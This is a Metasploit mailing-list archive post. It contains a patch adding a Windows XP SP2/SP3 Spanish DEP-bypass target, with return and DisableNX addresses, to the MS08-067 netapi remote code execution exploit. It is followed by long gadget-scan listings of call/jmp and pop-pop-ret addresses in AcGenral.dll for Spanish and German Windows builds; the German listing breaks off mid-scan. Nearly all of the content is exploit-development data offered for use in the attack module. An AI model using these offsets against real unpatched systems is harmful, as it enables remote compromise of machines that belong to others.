Metasploit mailing list archives
MS08-067 added to SVN trunk (3.2-testing)
From: ulises2k at gmail.com (Ulises2k)
Date: Wed, 29 Oct 2008 17:23:37 -0200
patch for Windows XP SP2/SP3 Spanish
--- ms08_067_netapi.rb 2008-10-28 14:58:32.000000000 -0200
+++ ms08_067_netapi.rb 2008-10-28 15:14:28.000000000 -0200
@@ -76,6 +76,14 @@
}
], # JMP ESI ACGENRAL.DLL, DEP/NX
BYPASS ACGENRAL.DLL
+ [ 'Windows XP SP2/SP3 Spanish
(DEP)',
+ {
+ 'Ret' =>
0x6fdbf807,
+ 'DisableNX' =>
0x6fdc17c2,
+ 'Scratch' =>
0x00020408,
+ }
+ ], # JMP ESI ACGENRAL.DLL, DEP/NX
BYPASS ACGENRAL.DLL
+
[ 'Windows 2003 SP0 English (NO
DEP)',
{
'Ret' =>
0x71bf175f,
-------------------------------------------------------------------------------------------
[acgenral.dll]
0x6fdbf807 call esi
0x6fdc14f8 call esi
0x6fdc153f call esi
0x6fdc18ab call esi
0x6fdc18b6 call esi
0x6fdc2b32 call esi
0x6fdc2b37 call esi
0x6fdc2b65 call esi
0x6fdc2b70 call esi
0x6fdc2b94 call esi
0x6fdc2b9a call esi
0x6fdc2bea call esi
0x6fdc2bef call esi
0x6fdc349c call esi
0x6fdc350c call esi
0x6fdc5334 call esi
0x6fdc533b call esi
0x6fdc53b4 call esi
0x6fdc53bb call esi
0x6fdc5a60 call esi
0x6fdc5a8e call esi
0x6fdc5add call esi
0x6fdc5ae2 call esi
0x6fdc6961 call esi
0x6fdc6964 call esi
0x6fdc6967 call esi
0x6fdc6a08 call esi
0x6fdc6a44 call esi
0x6fdc6a54 call esi
0x6fdc7fef call esi
0x6fdc7ff9 call esi
0x6fdc856e call esi
0x6fdcb04a call esi
0x6fdcd8c5 call esi
0x6fdcd8cd call esi
0x6fdcdaa8 call esi
0x6fdcdac0 call esi
0x6fdcdad3 call esi
0x6fdcdaeb call esi
0x6fdcdafe call esi
0x6fdcdb16 call esi
0x6fdcdb2d call esi
0x6fdcdb43 call esi
0x6fdcdb6c call esi
0x6fdcdc4c call esi
0x6fdcdc6a call esi
0x6fdcdc7d call esi
0x6fdcdc95 call esi
0x6fdcdcaa call esi
0x6fdcde42 call esi
0x6fdcdeaf call esi
0x6fdce055 call esi
0x6fdce06a call esi
0x6fdce0f5 call esi
0x6fdce105 call esi
0x6fdd092e call esi
0x6fdd093c call esi
0x6fdd1358 call esi
0x6fdd1375 call esi
0x6fdd1403 call esi
0x6fdd1421 call esi
0x6fdd3830 call esi
0x6fdd3843 call esi
0x6fdd387a call esi
0x6fdd388d call esi
0x6fdd38c4 call esi
0x6fdd38d7 call esi
0x6fdd4f80 call esi
0x6fdd4fa9 call esi
0x6fdd4fd2 call esi
0x6fdd4ffb call esi
0x6fdd5024 call esi
0x6fdd504d call esi
0x6fdd5076 call esi
0x6fdd509f call esi
0x6fdd50c8 call esi
0x6fdd8938 call esi
0x6fdd896f call esi
0x6fdd89a2 call esi
0x6fdd89c5 call esi
0x6fddba79 push esi; ret
0x6fddbac2 push esi; ret
0x6fddbafb push esi; ret
0x6fddc9da call esi
0x6fddca35 call esi
0x6fddd082 call esi
0x6fddd093 call esi
0x6fddd0a0 call esi
0x6fddd0b6 call esi
0x6fddd0c7 call esi
0x6fdde111 call esi
0x6fdde124 call esi
0x6fddff23 call esi
0x6fde174b call esi
[acgenral.dll]
0x6fdc17c2 6a048d4508506a226aff
--
Ulises U. Cu??
Web: http://www.ulises2k.com.ar
On Tue, Oct 28, 2008 at 12:41, Thierry Zoller <Thierry at zoller.lu> wrote:
Salut, Windows SP3 GERMAN Scanning C:\WINDOWS\AppPatch\AcGenral.dll for code useable with the EAX register 0x6FD9C45C call EAX 0x6FD9C4A3 call EAX 0x6FD9C4EA call EAX 0x6FD9C531 call EAX 0x6FD9C574 call EAX 0x6FD9C5B0 call EAX 0x6FD9C5EC call EAX 0x6FD9C628 call EAX 0x6FD9C66B call EAX 0x6FD9C67E call EAX 0x6FD9C6AE call EAX 0x6FD9C6C1 call EAX 0x6FD9C6F1 call EAX 0x6FD9C704 call EAX 0x6FD9C734 call EAX 0x6FD9C747 call EAX 0x6FD9F8C3 call EAX 0x6FDA49F9 call EAX 0x6FDA4A40 call EAX 0x6FDA4A87 call EAX 0x6FDA4AE1 call EAX 0x6FDA4B21 call EAX 0x6FDA4B61 call EAX 0x6FDA4B9B call EAX 0x6FDA4BD5 call EAX 0x6FDA4C0F call EAX 0x6FDA5F6A call EAX 0x6FDA617B call EAX 0x6FDA6448 call EAX 0x6FDA6517 call EAX 0x6FDA9C6F jmp EAX 0x6FDAACD1 call EAX 0x6FDAFB6F call EAX 0x6FDB1DA5 call EAX 0x6FDB1DE7 call EAX 0x6FDB1E65 call EAX 0x6FDB1EDB call EAX 0x6FDB60A2 call EAX 0x6FDB60FE call EAX 0x6FDB62C0 jmp EAX 0x6FDB62D3 jmp EAX 0x6FDB652D jmp EAX 0x6FDB6809 push EAX - ret 0x6FDB703F call EAX 0x6FDB7087 call EAX 0x6FDB7E76 call EAX 0x6FDB7E97 call EAX 0x6FDB7EB2 call EAX 0x6FDB7F40 call EAX 0x6FDB8B73 push EAX - ret 0x6FDB8B9B push EAX - ret 0x6FDB8DBA call EAX 0x6FDB9A53 call EAX 0x6FDB9A95 call EAX 0x6FDBCF8D call EAX 0x6FDBD012 call EAX 0x6FDBD0D7 call EAX 0x6FDBD11C call EAX 0x6FDBD12E call EAX 0x6FDBDCBE pop EAX - pop - ret 0x6FDC115B call EAX 0x6FDC175F jmp EAX Finished Scanning C:\WINDOWS\AppPatch\AcGenral.dll for code useable with the EAX register Found 62 usable addresses Findjmp, Eeye, I2S-LaB Findjmp2, Hat-Squad Scanning C:\WINDOWS\AppPatch\AcGenral.dll for code useable with the EBX register 0x6FD9C065 pop EBX - pop - retbis 0x6FD9D965 call EBX 0x6FD9D97F pop EBX - pop - retbis 0x6FD9E085 call EBX 0x6FD9E0B8 call EBX 0x6FD9E0BC pop EBX - pop - retbis 0x6FD9E0FB call EBX 0x6FD9E12E call EBX 0x6FD9E132 pop EBX - pop - retbis 0x6FD9E171 call EBX 0x6FD9E1A4 call EBX 0x6FD9E1A8 pop EBX - pop - retbis 0x6FD9E1E7 call EBX 0x6FD9E21A call EBX 0x6FD9E21E pop EBX - pop - retbis 0x6FD9EE35 pop EBX - pop - retbis 0x6FD9FCD8 pop EBX - pop - retbis 0x6FDA048B pop EBX - pop - retbis 0x6FDA0A37 pop EBX - pop - retbis 0x6FDA1420 pop EBX - pop - retbis 0x6FDA14FB call EBX 0x6FDA1608 pop EBX - pop - retbis 0x6FDA2524 pop EBX - pop - retbis 0x6FDA3229 pop EBX - pop - retbis 0x6FDA5A6C call EBX 0x6FDA5A94 call EBX 0x6FDA6298 call EBX 0x6FDA641A call EBX 0x6FDA7178 pop EBX - pop - retbis 0x6FDA76FB pop EBX - pop - retbis 0x6FDA827E pop EBX - pop - retbis 0x6FDA8341 call EBX 0x6FDA875E pop EBX - pop - retbis 0x6FDA89A2 pop EBX - pop - retbis 0x6FDA8D01 pop EBX - pop - retbis 0x6FDAA603 pop EBX - pop - retbis 0x6FDAA6D1 pop EBX - pop - retbis 0x6FDAAB5E pop EBX - pop - retbis 0x6FDAB5AD pop EBX - pop - retbis 0x6FDAB619 pop EBX - pop - retbis 0x6FDAC943 pop EBX - pop - retbis 0x6FDACA21 pop EBX - pop - retbis 0x6FDACED4 pop EBX - pop - retbis 0x6FDAE0F8 call EBX 0x6FDAE108 call EBX 0x6FDAF1A8 pop EBX - pop - retbis 0x6FDAF1E7 pop EBX - pop - retbis 0x6FDB0713 pop EBX - pop - retbis 0x6FDB126D pop EBX - pop - retbis 0x6FDB14E1 pop EBX - pop - retbis 0x6FDB155C pop EBX - pop - retbis 0x6FDB1852 pop EBX - pop - retbis 0x6FDB1E20 pop EBX - pop - retbis 0x6FDB1E9E pop EBX - pop - retbis 0x6FDB2032 pop EBX - pop - retbis 0x6FDB28A1 call EBX 0x6FDB28C0 call EBX 0x6FDB2939 pop EBX - pop - retbis 0x6FDB2A9B pop EBX - pop - retbis 0x6FDB2B6C pop EBX - pop - retbis 0x6FDB2C98 pop EBX - pop - retbis 0x6FDB2E05 pop EBX - pop - retbis 0x6FDB380F pop EBX - pop - retbis 0x6FDB3D0F pop EBX - pop - retbis 0x6FDB4120 pop EBX - pop - retbis 0x6FDB42C2 pop EBX - pop - retbis 0x6FDB4978 call EBX 0x6FDB49AF call EBX 0x6FDB54BA pop EBX - pop - retbis 0x6FDB5BA9 pop EBX - pop - retbis 0x6FDB5E74 pop EBX - pop - retbis 0x6FDB6108 pop EBX - pop - retbis 0x6FDB6BB7 pop EBX - pop - ret 0x6FDB6BBD pop EBX - pop - ret 0x6FDB7861 pop EBX - pop - ret 0x6FDB7B48 pop EBX - pop - ret 0x6FDB7FAE pop EBX - pop - ret 0x6FDB8B1A call EBX 0x6FDB8B3D call EBX 0x6FDB9016 call EBX 0x6FDB9040 call EBX 0x6FDB9F92 pop EBX - pop - ret 0x6FDBA033 pop EBX - pop - ret 0x6FDBAC9D call EBX 0x6FDBACFD call EBX 0x6FDBB234 pop EBX - pop - ret 0x6FDBCCAF call EBX 0x6FDBDF0D pop EBX - pop - ret 0x6FDBE645 pop EBX - pop - ret 0x6FDBE802 pop EBX - pop - ret 0x6FDC132F jmp EBX Finished Scanning C:\WINDOWS\AppPatch\AcGenral.dll for code useable with the EBX register Found 91 usable addresses Findjmp, Eeye, I2S-LaB Findjmp2, Hat-Squad Scanning C:\WINDOWS\AppPatch\AcGenral.dll for code useable with the ECX register 0x6FD9D2AE pop ECX - pop - retbis 0x6FD9E273 pop ECX - pop - retbis 0x6FDA0353 call ECX 0x6FDA16FF pop ECX - pop - ret 0x6FDA1B6D pop ECX - pop - ret 0x6FDA25BA pop ECX - pop - retbis 0x6FDA8445 pop ECX - pop - ret 0x6FDA84FF pop ECX - pop - ret 0x6FDB12E4 pop ECX - pop - ret 0x6FDB26FB pop ECX - pop - ret 0x6FDB2CFE pop ECX - pop - ret 0x6FDB6147 pop ECX - pop - ret 0x6FDB6267 pop ECX - pop - ret 0x6FDB67E0 pop ECX - pop - retbis 0x6FDB6FD6 push ECX - ret 0x6FDB762E pop ECX - pop - ret 0x6FDB7921 pop ECX - pop - ret 0x6FDB7A8F pop ECX - pop - ret 0x6FDB7CF4 pop ECX - pop - ret 0x6FDB7ED2 call ECX 0x6FDB7FC6 pop ECX - pop - ret 0x6FDB94B5 pop ECX - pop - ret 0x6FDB99D1 call ECX 0x6FDBA6E1 call ECX 0x6FDBB871 call ECX 0x6FDBC16E pop ECX - pop - ret 0x6FDBDD5E pop ECX - pop - ret 0x6FDBDD88 pop ECX - pop - ret 0x6FDBDDC5 pop ECX - pop - ret 0x6FDBDDEF pop ECX - pop - ret 0x6FDBE8F0 pop ECX - pop - ret Finished Scanning C:\WINDOWS\AppPatch\AcGenral.dll for code useable with the ECX register Found 31 usable addresses Findjmp, Eeye, I2S-LaB Findjmp2, Hat-Squad Scanning C:\WINDOWS\AppPatch\AcGenral.dll for code useable with the EDX register 0x6FDC17AF call EDX Finished Scanning C:\WINDOWS\AppPatch\AcGenral.dll for code useable with the EDX register Found 1 usable addresses Findjmp, Eeye, I2S-LaB Findjmp2, Hat-Squad Scanning C:\WINDOWS\AppPatch\AcGenral.dll for code useable with the ESI register 0x6FD9C1AA pop ESI - pop - retbis 0x6FD9C1E3 pop ESI - pop - retbis 0x6FD9C21C pop ESI - pop - retbis 0x6FD9C255 pop ESI - pop - retbis 0x6FD9C291 pop ESI - pop - retbis 0x6FD9C2D1 pop ESI - pop - retbis 0x6FD9C310 pop ESI - pop - retbis 0x6FD9C34F pop ESI - pop - retbis 0x6FD9C391 pop ESI - pop - retbis 0x6FD9C3D3 pop ESI - pop - retbis 0x6FD9C416 pop ESI - pop - retbis 0x6FD9C478 pop ESI - pop - retbis 0x6FD9C4BF pop ESI - pop - retbis 0x6FD9C506 pop ESI - pop - retbis 0x6FD9C54D pop ESI - pop - retbis 0x6FD9C589 pop ESI - pop - retbis 0x6FD9C5C5 pop ESI - pop - retbis 0x6FD9C601 pop ESI - pop - retbis 0x6FD9C63D pop ESI - pop - retbis 0x6FD9C680 pop ESI - pop - retbis 0x6FD9C6C3 pop ESI - pop - retbis 0x6FD9C706 pop ESI - pop - retbis 0x6FD9C749 pop ESI - pop - retbis 0x6FD9D3AA pop ESI - pop - retbis 0x6FD9D3FA pop ESI - pop - retbis 0x6FD9D432 pop ESI - pop - retbis 0x6FD9D4F5 pop ESI - pop - retbis 0x6FD9D8EB pop ESI - pop - retbis 0x6FD9DD9F pop ESI - pop - retbis 0x6FD9DDD8 pop ESI - pop - retbis 0x6FD9DE11 pop ESI - pop - retbis 0x6FD9DE4A pop ESI - pop - retbis 0x6FD9DE86 pop ESI - pop - retbis 0x6FD9DEC6 pop ESI - pop - retbis 0x6FD9DF05 pop ESI - pop - retbis 0x6FD9DF44 pop ESI - pop - retbis 0x6FD9DF86 pop ESI - pop - retbis 0x6FD9DFC8 pop ESI - pop - retbis 0x6FD9E00B pop ESI - pop - retbis 0x6FD9E2A0 pop ESI - pop - retbis 0x6FD9E6AC pop ESI - pop - retbis 0x6FD9E82F pop ESI - pop - ret 0x6FD9EC11 pop ESI - pop - retbis 0x6FD9EDB3 pop ESI - pop - retbis 0x6FD9F172 pop ESI - pop - retbis 0x6FD9F1AF pop ESI - pop - ret 0x6FD9F2D8 pop ESI - pop - retbis 0x6FD9F7AD pop ESI - pop - ret 0x6FD9F807 call ESI 0x6FD9F809 pop ESI - pop - retbis 0x6FD9F987 pop ESI - pop - ret 0x6FD9FC79 pop ESI - pop - ret 0x6FD9FE9C pop ESI - pop - retbis 0x6FD9FF56 pop ESI - pop - ret 0x6FD9FFD7 pop ESI - pop - retbis 0x6FDA005A pop ESI - pop - retbis 0x6FDA01E2 pop ESI - pop - retbis 0x6FDA021F pop ESI - pop - ret 0x6FDA038D pop ESI - pop - retbis 0x6FDA03FD pop ESI - pop - retbis 0x6FDA0443 pop ESI - pop - retbis 0x6FDA04E2 pop ESI - pop - retbis 0x6FDA055E pop ESI - pop - retbis 0x6FDA0599 pop ESI - pop - retbis 0x6FDA05DC pop ESI - pop - retbis 0x6FDA0715 pop ESI - pop - retbis 0x6FDA08D4 pop ESI - pop - retbis 0x6FDA0911 pop ESI - pop - ret 0x6FDA097A pop ESI - pop - retbis 0x6FDA0AAC pop ESI - pop - retbis 0x6FDA1098 pop ESI - pop - ret 0x6FDA145B pop ESI - pop - retbis 0x6FDA14F8 call ESI 0x6FDA153F call ESI 0x6FDA1645 pop ESI - pop - ret 0x6FDA1885 pop ESI - pop - ret 0x6FDA18AB call ESI 0x6FDA18B6 call ESI 0x6FDA18FF pop ESI - pop - retbis 0x6FDA1AB4 pop ESI - pop - ret 0x6FDA1C3E pop ESI - pop - ret 0x6FDA1C88 pop ESI - pop - retbis 0x6FDA229F pop ESI - pop - ret 0x6FDA2302 pop ESI - pop - retbis 0x6FDA2459 pop ESI - pop - retbis 0x6FDA2B32 call ESI 0x6FDA2B37 call ESI 0x6FDA2B65 call ESI 0x6FDA2B70 call ESI 0x6FDA2B94 call ESI 0x6FDA2B9A call ESI 0x6FDA2BEA call ESI 0x6FDA2BEF call ESI 0x6FDA2C7F pop ESI - pop - retbis 0x6FDA2CC9 pop ESI - pop - retbis 0x6FDA2F8E pop ESI - pop - retbis 0x6FDA30C4 pop ESI - pop - retbis 0x6FDA3475 pop ESI - pop - ret 0x6FDA349C call ESI 0x6FDA350C call ESI 0x6FDA38A4 pop ESI - pop - retbis 0x6FDA3AC8 pop ESI - pop - retbis 0x6FDA3B3F pop ESI - pop - retbis 0x6FDA3BE9 pop ESI - pop - ret 0x6FDA3EF6 pop ESI - pop - retbis 0x6FDA40F2 pop ESI - pop - ret 0x6FDA41E1 pop ESI - pop - ret 0x6FDA423A pop ESI - pop - retbis 0x6FDA42B6 pop ESI - pop - retbis 0x6FDA4332 pop ESI - pop - retbis 0x6FDA4438 pop ESI - pop - ret 0x6FDA4689 pop ESI - pop - retbis 0x6FDA4762 pop ESI - pop - retbis 0x6FDA479B pop ESI - pop - retbis 0x6FDA47D4 pop ESI - pop - retbis 0x6FDA480D pop ESI - pop - retbis 0x6FDA4849 pop ESI - pop - retbis 0x6FDA4889 pop ESI - pop - retbis 0x6FDA48C8 pop ESI - pop - retbis 0x6FDA4907 pop ESI - pop - retbis 0x6FDA4949 pop ESI - pop - retbis 0x6FDA498B pop ESI - pop - retbis 0x6FDA49CE pop ESI - pop - retbis 0x6FDA4A15 pop ESI - pop - retbis 0x6FDA4A5C pop ESI - pop - retbis 0x6FDA4AA3 pop ESI - pop - retbis 0x6FDA4AE3 pop ESI - pop - retbis 0x6FDA4B23 pop ESI - pop - retbis 0x6FDA4B63 pop ESI - pop - retbis 0x6FDA4B9D pop ESI - pop - retbis 0x6FDA4BD7 pop ESI - pop - retbis 0x6FDA4C11 pop ESI - pop - retbis 0x6FDA4FFE pop ESI - pop - retbis 0x6FDA51AA pop ESI - pop - ret 0x6FDA51FA pop ESI - pop - retbis 0x6FDA524C pop ESI - pop - retbis 0x6FDA5334 call ESI 0x6FDA533B call ESI 0x6FDA53B4 call ESI 0x6FDA53BB call ESI 0x6FDA560D pop ESI - pop - retbis 0x6FDA564A pop ESI - pop - ret 0x6FDA5A60 call ESI 0x6FDA5A8E call ESI 0x6FDA5ADD call ESI 0x6FDA5AE2 call ESI 0x6FDA5B90 pop ESI - pop - retbis 0x6FDA5BEB pop ESI - pop - retbis 0x6FDA607A pop ESI - pop - retbis 0x6FDA665C pop ESI - pop - retbis 0x6FDA6961 call ESI 0x6FDA6964 call ESI 0x6FDA6967 call ESI 0x6FDA6A08 call ESI 0x6FDA6A44 call ESI 0x6FDA6A54 call ESI 0x6FDA6DE6 pop ESI - pop - retbis 0x6FDA6E2A pop ESI - pop - retbis 0x6FDA6EF3 pop ESI - pop - retbis 0x6FDA7310 pop ESI - pop - retbis 0x6FDA74F8 pop ESI - pop - retbis 0x6FDA752F pop ESI - pop - retbis 0x6FDA75D0 pop ESI - pop - retbis 0x6FDA7738 pop ESI - pop - ret 0x6FDA7810 pop ESI - pop - retbis 0x6FDA7AA0 pop ESI - pop - retbis 0x6FDA7C98 pop ESI - pop - retbis 0x6FDA7E18 pop ESI - pop - ret 0x6FDA7E66 pop ESI - pop - retbis 0x6FDA7EB8 pop ESI - pop - retbis 0x6FDA7F09 pop ESI - pop - retbis 0x6FDA7FEF call ESI 0x6FDA7FF9 call ESI 0x6FDA8000 pop ESI - pop - retbis 0x6FDA81E0 pop ESI - pop - ret 0x6FDA856E call ESI 0x6FDA879B pop ESI - pop - ret 0x6FDA8D3E pop ESI - pop - ret 0x6FDA8E25 pop ESI - pop - retbis 0x6FDA8E5C pop ESI - pop - retbis 0x6FDA8E93 pop ESI - pop - retbis 0x6FDA8ECA pop ESI - pop - retbis 0x6FDA90F1 pop ESI - pop - retbis 0x6FDA91E5 pop ESI - pop - ret 0x6FDA9248 pop ESI - pop - retbis 0x6FDA9792 pop ESI - pop - retbis 0x6FDA97CF pop ESI - pop - ret 0x6FDA988B pop ESI - pop - retbis 0x6FDA98D2 pop ESI - pop - retbis 0x6FDA9916 pop ESI - pop - retbis 0x6FDA9966 pop ESI - pop - retbis 0x6FDA9BBA pop ESI - pop - ret 0x6FDA9CA5 pop ESI - pop - retbis 0x6FDA9F71 pop ESI - pop - ret 0x6FDAA309 pop ESI - pop - retbis 0x6FDAA350 pop ESI - pop - retbis 0x6FDAA3A1 pop ESI - pop - retbis 0x6FDAA3F5 pop ESI - pop - retbis 0x6FDAA538 pop ESI - pop - retbis 0x6FDAA959 pop ESI - pop - retbis 0x6FDAAB92 pop ESI - pop - retbis 0x6FDAAC79 pop ESI - pop - retbis 0x6FDAB002 pop ESI - pop - ret 0x6FDAB04A call ESI 0x6FDAB05F pop ESI - pop - retbis 0x6FDAB109 pop ESI - pop - ret 0x6FDAB14E pop ESI - pop - retbis 0x6FDAB54E pop ESI - pop - ret 0x6FDAB6FC pop ESI - pop - ret 0x6FDAB8A2 pop ESI - pop - retbis 0x6FDAB90F pop ESI - pop - retbis 0x6FDABE91 pop ESI - pop - retbis 0x6FDABEE6 pop ESI - pop - retbis 0x6FDABF31 pop ESI - pop - retbis 0x6FDABF74 pop ESI - pop - retbis 0x6FDABFA7 pop ESI - pop - retbis 0x6FDABFE0 pop ESI - pop - retbis 0x6FDAC197 pop ESI - pop - retbis 0x6FDAC5D8 pop ESI - pop - retbis 0x6FDAC605 pop ESI - pop - retbis 0x6FDAC63B pop ESI - pop - retbis 0x6FDAC671 pop ESI - pop - retbis 0x6FDAC7A8 pop ESI - pop - retbis 0x6FDAC7D6 pop ESI - pop - retbis 0x6FDACA57 pop ESI - pop - retbis 0x6FDACA91 pop ESI - pop - retbis 0x6FDACAFD pop ESI - pop - retbis 0x6FDACBCC pop ESI - pop - retbis 0x6FDACC0B pop ESI - pop - retbis 0x6FDACC4F pop ESI - pop - retbis 0x6FDACD3D pop ESI - pop - retbis 0x6FDACD93 pop ESI - pop - retbis 0x6FDACDE9 pop ESI - pop - retbis 0x6FDACE1E pop ESI - pop - retbis 0x6FDACE53 pop ESI - pop - retbis 0x6FDAD26E pop ESI - pop - retbis 0x6FDAD308 pop ESI - pop - retbis 0x6FDAD36E pop ESI - pop - retbis 0x6FDAD8C5 call ESI 0x6FDAD8CD call ESI 0x6FDADAA8 call ESI 0x6FDADAC0 call ESI 0x6FDADAD3 call ESI 0x6FDADAEB call ESI 0x6FDADAFE call ESI 0x6FDADB16 call ESI 0x6FDADB2D call ESI 0x6FDADB43 call ESI 0x6FDADB6C call ESI 0x6FDADC4C call ESI 0x6FDADC6A call ESI 0x6FDADC7D call ESI 0x6FDADC95 call ESI 0x6FDADCAA call ESI 0x6FDADE42 call ESI 0x6FDADEAF call ESI 0x6FDAE055 call ESI 0x6FDAE06A call ESI 0x6FDAE0F5 call ESI 0x6FDAE105 call ESI 0x6FDAE1B9 pop ESI - pop - ret 0x6FDAE39A pop ESI - pop - retbis 0x6FDAE473 pop ESI - pop - retbis 0x6FDAE4B2 pop ESI - pop - ret 0x6FDAE749 pop ESI - pop - ret 0x6FDAEC13 pop ESI - pop - ret 0x6FDAEC43 pop ESI - pop - retbis 0x6FDAEE4E pop ESI - pop - retbis 0x6FDAF010 pop ESI - pop - ret 0x6FDAF16B pop ESI - pop - ret 0x6FDAF22C pop ESI - pop - retbis 0x6FDAF271 pop ESI - pop - retbis 0x6FDAF2B8 pop ESI - pop - retbis 0x6FDAF2FC pop ESI - pop - retbis 0x6FDAF343 pop ESI - pop - retbis 0x6FDAF646 pop ESI - pop - retbis 0x6FDB02B9 pop ESI - pop - retbis 0x6FDB03E7 pop ESI - pop - retbis 0x6FDB042A pop ESI - pop - retbis 0x6FDB0483 pop ESI - pop - retbis 0x6FDB0589 pop ESI - pop - retbis 0x6FDB078D pop ESI - pop - retbis 0x6FDB092E call ESI 0x6FDB093C call ESI 0x6FDB0942 pop ESI - pop - retbis 0x6FDB0FBE pop ESI - pop - ret 0x6FDB1358 call ESI 0x6FDB1375 call ESI 0x6FDB1403 call ESI 0x6FDB1421 call ESI 0x6FDB15B1 pop ESI - pop - retbis 0x6FDB1AB9 pop ESI - pop - retbis 0x6FDB1D1A pop ESI - pop - retbis 0x6FDB1DBE pop ESI - pop - retbis 0x6FDB1F09 pop ESI - pop - retbis 0x6FDB21A4 pop ESI - pop - retbis 0x6FDB2475 pop ESI - pop - retbis 0x6FDB24AB pop ESI - pop - retbis 0x6FDB26B8 pop ESI - pop - retbis 0x6FDB2737 pop ESI - pop - ret 0x6FDB276C pop ESI - pop - retbis 0x6FDB279E pop ESI - pop - retbis 0x6FDB27DB pop ESI - pop - retbis 0x6FDB2806 pop ESI - pop - retbis 0x6FDB283D pop ESI - pop - retbis 0x6FDB2A17 pop ESI - pop - retbis 0x6FDB2A5F pop ESI - pop - retbis 0x6FDB2AFB pop ESI - pop - retbis 0x6FDB2B22 pop ESI - pop - retbis 0x6FDB2BD7 pop ESI - pop - retbis 0x6FDB2BFE pop ESI - pop - retbis 0x6FDB2C1D pop ESI - pop - retbis 0x6FDB2C3F pop ESI - pop - retbis 0x6FDB2CCB pop ESI - pop - retbis 0x6FDB2D20 pop ESI - pop - retbis 0x6FDB2D64 pop ESI - pop - retbis 0x6FDB2D97 pop ESI - pop - retbis 0x6FDB308D pop ESI - pop - retbis 0x6FDB30F5 pop ESI - pop - retbis 0x6FDB3429 pop ESI - pop - retbis 0x6FDB34FF pop ESI - pop - retbis 0x6FDB3547 pop ESI - pop - retbis 0x6FDB35C1 pop ESI - pop - retbis 0x6FDB361A pop ESI - pop - retbis 0x6FDB3661 pop ESI - pop - retbis 0x6FDB36F6 pop ESI - pop - retbis 0x6FDB3782 pop ESI - pop - retbis 0x6FDB37BD pop ESI - pop - retbis 0x6FDB3830 call ESI 0x6FDB3843 call ESI 0x6FDB385B pop ESI - pop - ret 0x6FDB387A call ESI 0x6FDB388D call ESI 0x6FDB38A5 pop ESI - pop - ret 0x6FDB38C4 call ESI 0x6FDB38D7 call ESI 0x6FDB38EF pop ESI - pop - ret 0x6FDB3A6A pop ESI - pop - retbis 0x6FDB3C1C pop ESI - pop - retbis 0x6FDB40DE pop ESI - pop - retbis 0x6FDB419C pop ESI - pop - retbis 0x6FDB42F9 pop ESI - pop - retbis 0x6FDB47AA pop ESI - pop - retbis 0x6FDB4A21 pop ESI - pop - retbis 0x6FDB4F80 call ESI 0x6FDB4FA9 call ESI 0x6FDB4FD2 call ESI 0x6FDB4FFB call ESI 0x6FDB5024 call ESI 0x6FDB504D call ESI 0x6FDB5076 call ESI 0x6FDB509F call ESI 0x6FDB50C8 call ESI 0x6FDB51AB pop ESI - pop - retbis 0x6FDB51FA pop ESI - pop - retbis 0x6FDB5260 pop ESI - pop - retbis 0x6FDB5300 pop ESI - pop - retbis 0x6FDB5C19 pop ESI - pop - retbis 0x6FDB5CE0 pop ESI - pop - retbis 0x6FDB5EE4 pop ESI - pop - retbis 0x6FDB6064 pop ESI - pop - retbis 0x6FDB628B pop ESI - pop - retbis 0x6FDB65E4 pop ESI - pop - ret 0x6FDB663C pop ESI - pop - ret 0x6FDB6798 pop ESI - pop - ret 0x6FDB7486 pop ESI - pop - ret 0x6FDB79D9 pop ESI - pop - ret 0x6FDB7AD4 pop ESI - pop - ret 0x6FDB7EA1 pop ESI - pop - ret 0x6FDB7F83 pop ESI - pop - ret 0x6FDB86DF pop ESI - pop - ret 0x6FDB8938 call ESI 0x6FDB896F call ESI 0x6FDB89A2 call ESI 0x6FDB89C5 call ESI 0x6FDB8E99 pop ESI - pop - ret 0x6FDB904D pop ESI - pop - ret 0x6FDB90EF pop ESI - pop - ret 0x6FDB9127 pop ESI - pop - ret 0x6FDB91A3 pop ESI - pop - ret 0x6FDB99F8 pop ESI - pop - ret 0x6FDB9B07 pop ESI - pop - retbis 0x6FDB9CF0 pop ESI - pop - ret 0x6FDB9FEE pop ESI - pop - ret 0x6FDBB1F5 pop ESI - pop - ret 0x6FDBC9DA call ESI 0x6FDBCA35 call ESI 0x6FDBCB64 pop ESI - pop - ret 0x6FDBD082 call ESI 0x6FDBD093 call ESI 0x6FDBD0A0 call ESI 0x6FDBD0B6 call ESI 0x6FDBD0C7 call ESI 0x6FDBD1A7 pop ESI - pop - ret 0x6FDBD24B pop ESI - pop - ret 0x6FDBD3E5 pop ESI - pop - ret 0x6FDBD44F pop ESI - pop - ret 0x6FDBD532 pop ESI - pop - ret 0x6FDBD7AC pop ESI - pop - ret 0x6FDBD7D1 pop ESI - pop - ret 0x6FDBD7F3 pop ESI - pop - ret 0x6FDBD88C pop ESI - pop - ret 0x6FDBE111 call ESI 0x6FDBE124 call ESI 0x6FDBE312 pop ESI - pop - ret 0x6FDBE57C pop ESI - pop - ret 0x6FDBE83A pop ESI - pop - ret 0x6FDBEAB5 pop ESI - pop - ret 0x6FDBEC59 pop ESI - pop - ret 0x6FDBED2E pop ESI - pop - ret 0x6FDBFF23 call ESI 0x6FDC174B call ESI Finished Scanning C:\WINDOWS\AppPatch\AcGenral.dll for code useable with the ESI register Found 412 usable addresses Findjmp, Eeye, I2S-LaB Findjmp2, Hat-Squad Scanning C:\WINDOWS\AppPatch\AcGenral.dll for code useable with the EDI register 0x6FD98937 jmp EDI 0x6FD9C171 pop EDI - pop - retbis 0x6FD9F898 pop EDI - pop - retbis 0x6FD9F94A pop EDI - pop - retbis 0x6FD9FC3C pop EDI - pop - retbis 0x6FD9FDCA call EDI 0x6FD9FDEA call EDI 0x6FDA0C82 call EDI 0x6FDA0CED call EDI 0x6FDA105B pop EDI - pop - retbis 0x6FDA167F call EDI 0x6FDA168E call EDI 0x6FDA1793 pop EDI - pop - retbis 0x6FDA1848 pop EDI - pop - retbis 0x6FDA196C pop EDI - pop - retbis 0x6FDA19CB call EDI 0x6FDA19E1 call EDI 0x6FDA1A77 pop EDI - pop - retbis 0x6FDA1AED call EDI 0x6FDA1AFC call EDI 0x6FDA1C01 pop EDI - pop - retbis 0x6FDA1C85 call EDI 0x6FDA2685 call EDI 0x6FDA26A5 call EDI 0x6FDA3BAC pop EDI - pop - retbis 0x6FDA3DB8 pop EDI - pop - retbis 0x6FDA3EC6 pop EDI - pop - retbis 0x6FDA4580 pop EDI - pop - retbis 0x6FDA45C6 pop EDI - pop - retbis 0x6FDA516D pop EDI - pop - retbis 0x6FDA5372 pop EDI - pop - retbis 0x6FDA53F2 pop EDI - pop - retbis 0x6FDA5D78 call EDI 0x6FDA5DA9 call EDI 